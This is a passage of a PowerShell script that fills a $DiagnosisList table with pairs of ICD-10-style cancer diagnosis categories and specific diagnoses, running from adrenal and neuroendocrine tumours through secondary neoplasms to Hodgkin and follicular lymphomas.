adrenal gland") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of cortex of adrenal gland","Malignant neoplasm of cortex of right adrenal gland") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of cortex of adrenal gland","Malignant neoplasm of cortex of left adrenal gland") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of medulla of adrenal gland","Malignant neoplasm of medulla of unspecified adrenal gland") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of medulla of adrenal gland","Malignant neoplasm of medulla of right adrenal gland") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of medulla of adrenal gland","Malignant neoplasm of medulla of left adrenal gland") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of unspecified part of adrenal gland","Malignant neoplasm of unspecified part of unspecified adrenal gland") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of unspecified part of adrenal gland","Malignant neoplasm of unspecified part of right adrenal gland") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of unspecified part of adrenal gland","Malignant neoplasm of unspecified part of left adrenal gland") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other endocrine glands and related structures","Malignant neoplasm of parathyroid gland") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other endocrine glands and related structures","Malignant neoplasm of pituitary gland") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other endocrine glands and related structures","Malignant neoplasm of craniopharyngeal duct") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other endocrine glands and related structures","Malignant neoplasm of pineal gland") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other endocrine glands and related structures","Malignant neoplasm of carotid body") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other endocrine glands and related structures","Malignant neoplasm of aortic body and other paraganglia") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other endocrine glands and related structures","Malignant neoplasm with pluriglandular involvement, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other endocrine glands and related structures","Malignant neoplasm of endocrine gland, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors","Malignant carcinoid tumor of unspecified site") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of the small intestine","Malignant carcinoid tumor of the duodenum") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of the small intestine","Malignant carcinoid tumor of the jejunum") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of the small intestine","Malignant carcinoid tumor of the ileum") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of the small intestine","Malignant carcinoid tumor of the small intestine, unspecified portion") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of the appendix, large intestine, and rectum","Malignant carcinoid tumor of the appendix") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of the appendix, large intestine, and rectum","Malignant carcinoid tumor of the cecum") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of the appendix, large intestine, and rectum","Malignant carcinoid tumor of the ascending colon") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of the appendix, large intestine, and rectum","Malignant carcinoid tumor of the transverse colon") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of the appendix, large intestine, and rectum","Malignant carcinoid tumor of the descending colon") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of the appendix, large intestine, and rectum","Malignant carcinoid tumor of the sigmoid colon") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of the appendix, large intestine, and rectum","Malignant carcinoid tumor of the rectum") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of the appendix, large intestine, and rectum","Malignant carcinoid tumor of the large intestine, unspecified portion") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of other sites","Malignant carcinoid tumor of the bronchus and lung") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of other sites","Malignant carcinoid tumor of the thymus") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of other sites","Malignant carcinoid tumor of the stomach") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of other sites","Malignant carcinoid tumor of the kidney") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of other sites","Malignant carcinoid tumor of the foregut, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of other sites","Malignant carcinoid tumor of the midgut, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of other sites","Malignant carcinoid tumor of the hindgut, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant carcinoid tumors of other sites","Malignant carcinoid tumors of other sites") + $null = $DiagnosisList.Rows.Add("Malignant poorly differentiated neuroendocrine tumors","Malignant poorly differentiated neuroendocrine tumors") + $null = $DiagnosisList.Rows.Add("Other malignant neuroendocrine tumors","Other malignant neuroendocrine tumors") + $null = $DiagnosisList.Rows.Add("Secondary carcinoid tumors","Secondary carcinoid tumors, unspecified site") + $null = $DiagnosisList.Rows.Add("Secondary carcinoid tumors","Secondary carcinoid tumors of distant lymph nodes") + $null = $DiagnosisList.Rows.Add("Secondary carcinoid tumors","Secondary carcinoid tumors of liver") + $null = $DiagnosisList.Rows.Add("Secondary carcinoid tumors","Secondary carcinoid tumors of bone") + $null = $DiagnosisList.Rows.Add("Secondary carcinoid tumors","Secondary carcinoid tumors of peritoneum") + $null = $DiagnosisList.Rows.Add("Secondary carcinoid tumors","Secondary carcinoid tumors of other sites") + $null = $DiagnosisList.Rows.Add("Secondary Merkel cell carcinoma","Secondary Merkel cell carcinoma") + $null = $DiagnosisList.Rows.Add("Other secondary neuroendocrine tumors","Other secondary neuroendocrine tumors") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and ill-defined sites","Malignant neoplasm of head, face and neck") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and ill-defined sites","Malignant neoplasm of thorax") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and ill-defined sites","Malignant neoplasm of abdomen") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and ill-defined sites","Malignant neoplasm of pelvis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of upper limb","Malignant neoplasm of unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of upper limb","Malignant neoplasm of right upper limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of upper limb","Malignant neoplasm of left upper limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lower limb","Malignant neoplasm of unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lower limb","Malignant neoplasm of right lower limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lower limb","Malignant neoplasm of left lower limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other specified ill-defined sites","Malignant neoplasm of other specified ill-defined sites") + $null = $DiagnosisList.Rows.Add("Secondary and unspecified malignant neoplasm of lymph nodes","Secondary and unspecified malignant neoplasm of lymph nodes of head, face and neck") + $null = $DiagnosisList.Rows.Add("Secondary and unspecified malignant neoplasm of lymph nodes","Secondary and unspecified malignant neoplasm of intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Secondary and unspecified malignant neoplasm of lymph nodes","Secondary and unspecified malignant neoplasm of intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Secondary and unspecified malignant neoplasm of lymph nodes","Secondary and unspecified malignant neoplasm of axilla and upper limb lymph nodes") + $null = $DiagnosisList.Rows.Add("Secondary and unspecified malignant neoplasm of lymph nodes","Secondary and unspecified malignant neoplasm of inguinal and lower limb lymph nodes") + $null = $DiagnosisList.Rows.Add("Secondary and unspecified malignant neoplasm of lymph nodes","Secondary and unspecified malignant neoplasm of intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Secondary and unspecified malignant neoplasm of lymph nodes","Secondary and unspecified malignant neoplasm of lymph nodes of multiple regions") + $null = $DiagnosisList.Rows.Add("Secondary and unspecified malignant neoplasm of lymph nodes","Secondary and unspecified malignant neoplasm of lymph node, unspecified") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of lung","Secondary malignant neoplasm of unspecified lung") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of lung","Secondary malignant neoplasm of right lung") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of lung","Secondary malignant neoplasm of left lung") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of mediastinum","Secondary malignant neoplasm of mediastinum") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of pleura","Secondary malignant neoplasm of pleura") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of other and unspecified respiratory organs","Secondary malignant neoplasm of unspecified respiratory organ") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of other and unspecified respiratory organs","Secondary malignant neoplasm of other respiratory organs") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of small intestine","Secondary malignant neoplasm of small intestine") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of large intestine and rectum","Secondary malignant neoplasm of large intestine and rectum") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of retroperitoneum and peritoneum","Secondary malignant neoplasm of retroperitoneum and peritoneum") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of liver and intrahepatic bile duct","Secondary malignant neoplasm of liver and intrahepatic bile duct") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of other and unspecified digestive organs","Secondary malignant neoplasm of unspecified digestive organ") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of other and unspecified digestive organs","Secondary malignant neoplasm of other digestive organs") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of kidney and renal pelvis","Secondary malignant neoplasm of unspecified kidney and renal pelvis") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of kidney and renal pelvis","Secondary malignant neoplasm of right kidney and renal pelvis") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of kidney and renal pelvis","Secondary malignant neoplasm of left kidney and renal pelvis") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of bladder and other and unspecified urinary organs","Secondary malignant neoplasm of unspecified urinary organs") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of bladder and other and unspecified urinary organs","Secondary malignant neoplasm of bladder") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of bladder and other and unspecified urinary organs","Secondary malignant neoplasm of other urinary organs") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of skin","Secondary malignant neoplasm of skin") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of brain and cerebral meninges","Secondary malignant neoplasm of brain") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of brain and cerebral meninges","Secondary malignant neoplasm of cerebral meninges") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of other and unspecified parts of nervous system","Secondary malignant neoplasm of unspecified part of nervous system") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of other and unspecified parts of nervous system","Secondary malignant neoplasm of other parts of nervous system") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of bone and bone marrow","Secondary malignant neoplasm of bone") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of bone and bone marrow","Secondary malignant neoplasm of bone marrow") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of ovary","Secondary malignant neoplasm of unspecified ovary") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of ovary","Secondary malignant neoplasm of right ovary") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of ovary","Secondary malignant neoplasm of left ovary") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of adrenal gland","Secondary malignant neoplasm of unspecified adrenal gland") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of adrenal gland","Secondary malignant neoplasm of right adrenal gland") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of adrenal gland","Secondary malignant neoplasm of left adrenal gland") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of other specified sites","Secondary malignant neoplasm of breast") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of other specified sites","Secondary malignant neoplasm of genital organs") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of other specified sites","Secondary malignant neoplasm of other specified sites") + $null = $DiagnosisList.Rows.Add("Secondary malignant neoplasm of unspecified site","Secondary malignant neoplasm of unspecified site") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm without specification of site","Disseminated malignant neoplasm, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm without specification of site","Malignant (primary) neoplasm, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm without specification of site","Malignant neoplasm associated with transplanted organ") + $null = $DiagnosisList.Rows.Add("Nodular lymphocyte predominant Hodgkin lymphoma","Nodular lymphocyte predominant Hodgkin lymphoma, unspecified site") + $null = $DiagnosisList.Rows.Add("Nodular lymphocyte predominant Hodgkin lymphoma","Nodular lymphocyte predominant Hodgkin lymphoma, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Nodular lymphocyte predominant Hodgkin lymphoma","Nodular lymphocyte predominant Hodgkin lymphoma, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Nodular lymphocyte predominant Hodgkin lymphoma","Nodular lymphocyte predominant Hodgkin lymphoma, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Nodular lymphocyte predominant Hodgkin lymphoma","Nodular lymphocyte predominant Hodgkin lymphoma, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Nodular lymphocyte predominant Hodgkin lymphoma","Nodular lymphocyte predominant Hodgkin lymphoma, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Nodular lymphocyte predominant Hodgkin lymphoma","Nodular lymphocyte predominant Hodgkin lymphoma, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Nodular lymphocyte predominant Hodgkin lymphoma","Nodular lymphocyte predominant Hodgkin lymphoma, spleen") + $null = $DiagnosisList.Rows.Add("Nodular lymphocyte predominant Hodgkin lymphoma","Nodular lymphocyte predominant Hodgkin lymphoma, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Nodular lymphocyte predominant Hodgkin lymphoma","Nodular lymphocyte predominant Hodgkin lymphoma, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Nodular sclerosis Hodgkin lymphoma","Nodular sclerosis Hodgkin lymphoma, unspecified site") + $null = $DiagnosisList.Rows.Add("Nodular sclerosis Hodgkin lymphoma","Nodular sclerosis Hodgkin lymphoma, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Nodular sclerosis Hodgkin lymphoma","Nodular sclerosis Hodgkin lymphoma, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Nodular sclerosis Hodgkin lymphoma","Nodular sclerosis Hodgkin lymphoma, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Nodular sclerosis Hodgkin lymphoma","Nodular sclerosis Hodgkin lymphoma, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Nodular sclerosis Hodgkin lymphoma","Nodular sclerosis Hodgkin lymphoma, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Nodular sclerosis Hodgkin lymphoma","Nodular sclerosis Hodgkin lymphoma, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Nodular sclerosis Hodgkin lymphoma","Nodular sclerosis Hodgkin lymphoma, spleen") + $null = $DiagnosisList.Rows.Add("Nodular sclerosis Hodgkin lymphoma","Nodular sclerosis Hodgkin lymphoma, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Nodular sclerosis Hodgkin lymphoma","Nodular sclerosis Hodgkin lymphoma, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Mixed cellularity Hodgkin lymphoma","Mixed cellularity Hodgkin lymphoma, unspecified site") + $null = $DiagnosisList.Rows.Add("Mixed cellularity Hodgkin lymphoma","Mixed cellularity Hodgkin lymphoma, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Mixed cellularity Hodgkin lymphoma","Mixed cellularity Hodgkin lymphoma, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Mixed cellularity Hodgkin lymphoma","Mixed cellularity Hodgkin lymphoma, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Mixed cellularity Hodgkin lymphoma","Mixed cellularity Hodgkin lymphoma, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Mixed cellularity Hodgkin lymphoma","Mixed cellularity Hodgkin lymphoma, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Mixed cellularity Hodgkin lymphoma","Mixed cellularity Hodgkin lymphoma, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Mixed cellularity Hodgkin lymphoma","Mixed cellularity Hodgkin lymphoma, spleen") + $null = $DiagnosisList.Rows.Add("Mixed cellularity Hodgkin lymphoma","Mixed cellularity Hodgkin lymphoma, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Mixed cellularity Hodgkin lymphoma","Mixed cellularity Hodgkin lymphoma, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Lymphocyte depleted Hodgkin lymphoma","Lymphocyte depleted Hodgkin lymphoma, unspecified site") + $null = $DiagnosisList.Rows.Add("Lymphocyte depleted Hodgkin lymphoma","Lymphocyte depleted Hodgkin lymphoma, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Lymphocyte depleted Hodgkin lymphoma","Lymphocyte depleted Hodgkin lymphoma, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Lymphocyte depleted Hodgkin lymphoma","Lymphocyte depleted Hodgkin lymphoma, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Lymphocyte depleted Hodgkin lymphoma","Lymphocyte depleted Hodgkin lymphoma, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Lymphocyte depleted Hodgkin lymphoma","Lymphocyte depleted Hodgkin lymphoma, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Lymphocyte depleted Hodgkin lymphoma","Lymphocyte depleted Hodgkin lymphoma, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Lymphocyte depleted Hodgkin lymphoma","Lymphocyte depleted Hodgkin lymphoma, spleen") + $null = $DiagnosisList.Rows.Add("Lymphocyte depleted Hodgkin lymphoma","Lymphocyte depleted Hodgkin lymphoma, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Lymphocyte depleted Hodgkin lymphoma","Lymphocyte depleted Hodgkin lymphoma, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Lymphocyte-rich Hodgkin lymphoma","Lymphocyte-rich Hodgkin lymphoma, unspecified site") + $null = $DiagnosisList.Rows.Add("Lymphocyte-rich Hodgkin lymphoma","Lymphocyte-rich Hodgkin lymphoma, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Lymphocyte-rich Hodgkin lymphoma","Lymphocyte-rich Hodgkin lymphoma, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Lymphocyte-rich Hodgkin lymphoma","Lymphocyte-rich Hodgkin lymphoma, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Lymphocyte-rich Hodgkin lymphoma","Lymphocyte-rich Hodgkin lymphoma, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Lymphocyte-rich Hodgkin lymphoma","Lymphocyte-rich Hodgkin lymphoma, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Lymphocyte-rich Hodgkin lymphoma","Lymphocyte-rich Hodgkin lymphoma, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Lymphocyte-rich Hodgkin lymphoma","Lymphocyte-rich Hodgkin lymphoma, spleen") + $null = $DiagnosisList.Rows.Add("Lymphocyte-rich Hodgkin lymphoma","Lymphocyte-rich Hodgkin lymphoma, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Lymphocyte-rich Hodgkin lymphoma","Lymphocyte-rich Hodgkin lymphoma, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Other Hodgkin lymphoma","Other Hodgkin lymphoma, unspecified site") + $null = $DiagnosisList.Rows.Add("Other Hodgkin lymphoma","Other Hodgkin lymphoma, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Other Hodgkin lymphoma","Other Hodgkin lymphoma, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Other Hodgkin lymphoma","Other Hodgkin lymphoma, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Other Hodgkin lymphoma","Other Hodgkin lymphoma, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Other Hodgkin lymphoma","Other Hodgkin lymphoma, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Other Hodgkin lymphoma","Other Hodgkin lymphoma, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Other Hodgkin lymphoma","Other Hodgkin lymphoma, spleen") + $null = $DiagnosisList.Rows.Add("Other Hodgkin lymphoma","Other Hodgkin lymphoma, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Other Hodgkin lymphoma","Other Hodgkin lymphoma, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Hodgkin lymphoma, unspecified","Hodgkin lymphoma, unspecified, unspecified site") + $null = $DiagnosisList.Rows.Add("Hodgkin lymphoma, unspecified","Hodgkin lymphoma, unspecified, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Hodgkin lymphoma, unspecified","Hodgkin lymphoma, unspecified, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Hodgkin lymphoma, unspecified","Hodgkin lymphoma, unspecified, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Hodgkin lymphoma, unspecified","Hodgkin lymphoma, unspecified, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Hodgkin lymphoma, unspecified","Hodgkin lymphoma, unspecified, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Hodgkin lymphoma, unspecified","Hodgkin lymphoma, unspecified, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Hodgkin lymphoma, unspecified","Hodgkin lymphoma, unspecified, spleen") + $null = $DiagnosisList.Rows.Add("Hodgkin lymphoma, unspecified","Hodgkin lymphoma, unspecified, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Hodgkin lymphoma, unspecified","Hodgkin lymphoma, unspecified, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade I","Follicular lymphoma grade I, unspecified site") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade I","Follicular lymphoma grade I, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade I","Follicular lymphoma grade I, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade I","Follicular lymphoma grade I, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade I","Follicular lymphoma grade I, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade I","Follicular lymphoma grade I, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade I","Follicular lymphoma grade I, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade I","Follicular lymphoma grade I, spleen") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade I","Follicular lymphoma grade I, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade I","Follicular lymphoma grade I, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade II","Follicular lymphoma grade II, unspecified site") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade II","Follicular lymphoma grade II, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade II","Follicular lymphoma grade II, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade II","Follicular lymphoma grade II, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade II","Follicular lymphoma grade II, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade II","Follicular lymphoma grade II, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade II","Follicular lymphoma grade II, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade II","Follicular lymphoma grade II, spleen") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade II","Follicular lymphoma grade II, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade II","Follicular lymphoma grade II, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade III, unspecified","Follicular lymphoma grade III, unspecified, unspecified site") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade III, unspecified","Follicular lymphoma grade III, unspecified, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade III, unspecified","Follicular lymphoma grade III, unspecified, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade III, unspecified","Follicular lymphoma grade III, unspecified, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade III, unspecified","Follicular lymphoma grade III, unspecified, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade III, unspecified","Follicular lymphoma grade III, unspecified, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade III, unspecified","Follicular lymphoma grade III, unspecified, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade III, unspecified","Follicular lymphoma grade III, unspecified, spleen") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade III, unspecified","Follicular lymphoma grade III, unspecified, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade III, unspecified","Follicular lymphoma grade III, unspecified, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIa","Follicular lymphoma grade IIIa, unspecified site") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIa","Follicular lymphoma grade IIIa, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIa","Follicular lymphoma grade IIIa, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIa","Follicular lymphoma grade IIIa, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIa","Follicular lymphoma grade IIIa, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIa","Follicular lymphoma grade IIIa, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIa","Follicular lymphoma grade IIIa, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIa","Follicular lymphoma grade IIIa, spleen") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIa","Follicular lymphoma grade IIIa, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIa","Follicular lymphoma grade IIIa, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIb","Follicular lymphoma grade IIIb, unspecified site") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIb","Follicular lymphoma grade IIIb, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIb","Follicular lymphoma grade IIIb, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIb","Follicular lymphoma grade IIIb, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIb","Follicular lymphoma grade IIIb, lymph nodes of axilla and upper limb") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIb","Follicular lymphoma grade IIIb, lymph nodes of inguinal region and lower limb") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIb","Follicular lymphoma grade IIIb, intrapelvic lymph nodes") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIb","Follicular lymphoma grade IIIb, spleen") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIb","Follicular lymphoma grade IIIb, lymph nodes of multiple sites") + $null = $DiagnosisList.Rows.Add("Follicular lymphoma grade IIIb","Follicular lymphoma grade IIIb, extranodal and solid organ sites") + $null = $DiagnosisList.Rows.Add("Diffuse follicle center lymphoma","Diffuse follicle center lymphoma, unspecified site") + $null = $DiagnosisList.Rows.Add("Diffuse follicle center lymphoma","Diffuse follicle center lymphoma, lymph nodes of head, face, and neck") + $null = $DiagnosisList.Rows.Add("Diffuse follicle center lymphoma","Diffuse follicle center lymphoma, intrathoracic lymph nodes") + $null = $DiagnosisList.Rows.Add("Diffuse follicle center lymphoma","Diffuse follicle center lymphoma, intra-abdominal lymph nodes") + $null = $DiagnosisList.Rows.Add("Diffuse follicle center lymphoma","Diffuse follicle center lymphoma, lymph nodes of axilla and upper 